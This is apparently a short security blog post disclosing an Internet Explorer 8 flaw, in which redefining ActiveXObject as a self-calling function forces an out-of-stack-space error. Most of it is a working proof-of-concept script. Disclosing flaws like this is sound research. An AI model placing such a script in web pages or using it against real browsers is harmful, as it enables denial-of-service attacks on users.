MSIE 8 Out Of Stack Space.

Publicated on : 1211223437
First time I saw such error message in a browser.



It's not the same as an out-of-memory problem, but a out-of-stack-space problem. I wrote about a similar attack on MSIE 8 in March, that resulted in a persistent denial of service. This vulnerability here basically does the same but doesn't crash MSIE. There might be a better term for it of which I am not aware, but I like to call it function aliasing since that suits it the best. Interestingly, it not only works on the new XDR object found in March, but also on a regular XmlHttpRequest function inside MSIE 8. I think more is possible with this kind of attack. I might do a stack trace when I have the time, but for now here is a small sample that triggers and out-of-stack-space message under a second, which is the fastest I ever seen:

<script>
 


 

xmlhttp = ActiveXObject;
 


 

ActiveXObject = function() {
 

return new ActiveXObject("MSXML2.XMLHTTP");
 

}
 


 

ping = 'hello';
 

xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
 

xmlhttp.open("GET", "#", false);
 

xmlhttp.send(ping);
 


 

</script>